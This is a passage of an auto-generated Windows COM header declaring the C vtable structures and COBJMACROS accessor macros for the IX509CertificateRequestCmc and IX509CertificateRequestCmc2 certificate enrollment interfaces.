        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplateName )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_EncryptionStrength )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptedKeyHash )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificates )( 
            __RPC__in IX509CertificateRequestCmc * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificates **ppValue);
        
        END_INTERFACE
    } IX509CertificateRequestCmcVtbl;

    interface IX509CertificateRequestCmc
    {
        CONST_VTBL struct IX509CertificateRequestCmcVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCmc_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCmc_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCmc_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCmc_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCmc_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCmc_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCmc_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCmc_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCmc_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCmc_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCmc_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCmc_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCmc_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCmc_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCmc_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCmc_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCmc_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCmc_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCmc_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCmc_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCmc_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCmc_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCmc_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCmc_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCmc_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCmc_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCmc_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestCmc_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCmc_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestCmc_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestCmc_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCmc_InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName) ) 

#define IX509CertificateRequestCmc_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCmc_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_TransactionId(This,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,pValue) ) 

#define IX509CertificateRequestCmc_put_TransactionId(This,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Value) ) 

#define IX509CertificateRequestCmc_get_SenderNonce(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SenderNonce(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_SenderNonce(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SenderNonce(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCmc_get_ArchivePrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ArchivePrivateKey(This,pValue) ) 

#define IX509CertificateRequestCmc_put_ArchivePrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_ArchivePrivateKey(This,Value) ) 

#define IX509CertificateRequestCmc_get_KeyArchivalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_KeyArchivalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_put_KeyArchivalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyArchivalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestCmc_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestCmc_get_EncryptedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHash(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc_get_SignerCertificates(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificates(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCmc_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCmc2_INTERFACE_DEFINED__
#define __IX509CertificateRequestCmc2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCmc2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCmc2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35d-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCmc2 : public IX509CertificateRequestCmc
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromInnerRequestTemplate( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( 
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes = AllowedKeySignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckCertificateSignature( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCertificate,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCmc2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCmc2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCmc2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ VARIANT_BOOL RenewalRequest,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequest )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_RequesterName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromInnerRequestTemplateName )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pInnerRequest,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SenderNonce )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ArchivePrivateKey )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyArchivalCertificate )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncryptionAlgorithm )( 
            __RPC__in IX509CertificateRequestCmc2 * This,
